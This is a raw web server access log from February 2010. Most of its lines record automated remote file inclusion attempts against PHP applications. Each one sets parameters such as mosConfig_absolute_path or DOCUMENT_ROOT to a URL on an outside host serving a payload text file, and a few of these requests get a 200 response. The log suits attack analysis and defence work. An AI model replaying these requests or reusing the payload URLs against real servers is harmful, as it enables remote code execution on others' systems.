125.141.196.78 - - [15/Feb/2010:04:25:19 -0500] "GET /logs/access_log.Q110020100//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:19 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:32 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:32 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:34 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:25:34 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:25:37 -0500] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:37 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:25:39 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /logs/error_log.Q109072900%20%20/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /logs/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /logs/error_log.Q109072900%20%20/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:00 -0500] "GET /logs/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:26:03 -0500] "GET /logs/////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:26:03 -0500] "GET /logs/access_log.Q109092200/////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:26:03 -0500] "GET /////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:04 -0500] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:04:26:09 -0500] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:26:40 -0500] "GET /logs/error_log.Q109092300/////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:26:59 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:26:59 -0500] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:26:59 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 38409 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:27:02 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:27:02 -0500] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:27:02 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 38409 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:27:08 -0500] "GET /logs/error_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:27:12 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:04:27:21 -0500] "GET /logs/error_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:27:27 -0500] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.66.76 - - [15/Feb/2010:04:27:28 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.128.242 - - [15/Feb/2010:04:28:12 -0500] "GET /jwebs.co.kr/404.html HTTP/1.1" 404 218 "-" "Yandex/1.01.001 (compatible; Win16; I)"
75.125.84.226 - - [15/Feb/2010:04:28:13 -0500] "GET /logs/////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:04:28:13 -0500] "GET /////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:04:28:13 -0500] "GET /logs/access_log.Q109092200/////index.php?DOCUMENT_ROOT=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET ///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET ///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET ///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:28:15 -0500] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
188.61.181.34 - - [15/Feb/2010:04:28:21 -0500] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.181.7.85 - - [15/Feb/2010:04:28:46 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.17.139.19 - - [15/Feb/2010:04:28:59 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 220 "-" "Mozilla/3.0 (OS/2; U)"
213.239.230.130 - - [15/Feb/2010:04:29:05 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/3.0 (OS/2; U)"
213.239.230.130 - - [15/Feb/2010:04:29:05 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/3.0 (OS/2; U)"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/access_log.Q109062100/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/access_log.Q109060600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/access_log.Q109060600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /logs/access_log.Q109062100/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:06 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /logs/access_log.Q109060600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /logs/access_log.Q109062100/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /logs/access_log.Q109060600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:07 -0500] "GET /logs/access_log.Q109062100/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /logs/access_log.Q109062100%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /logs/access_log.Q109060600%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:09 -0500] "GET /logs/access_log.Q109060600%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:10 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:10 -0500] "GET /logs/access_log.Q109062100%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:10 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:10 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/access_log.Q109060600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/access_log.Q109062100/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/access_log.Q109060600%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:11 -0500] "GET /logs/access_log.Q109062100%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:12 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:12 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:12 -0500] "GET /logs/access_log.Q109062100%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:12 -0500] "GET /logs/access_log.Q109060600%20%20/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.139.19 - - [15/Feb/2010:04:29:32 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
125.141.196.78 - - [15/Feb/2010:04:29:39 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:39 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:39 -0500] "GET /logs/access_log.Q109101500/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:40 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:41 -0500] "GET /logs/access_log.Q109101500/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:41 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:42 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:42 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:42 -0500] "GET /logs/access_log.Q109101500/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:48 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:48 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:49 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:49 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:49 -0500] "GET /logs/access_log.Q109101500/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:29:49 -0500] "GET /logs/access_log.Q109101500/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:04 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:04 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:04 -0500] "GET /logs/error_log.Q109100700/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:09 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:09 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:09 -0500] "GET /logs/error_log.Q109100700/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /logs/error_log.Q109100700/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /logs/error_log.Q109100700/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:11 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:12 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:12 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:30:12 -0500] "GET /logs/error_log.Q109100700/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:25 -0500] "GET /////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:25 -0500] "GET /logs/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:25 -0500] "GET /logs/access_log.Q110011800%20%20/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:04:30:26 -0500] "GET ///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:04:30:26 -0500] "GET /logs///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:04:30:26 -0500] "GET /logs/access_log.Q110021100///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:27 -0500] "GET /logs/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
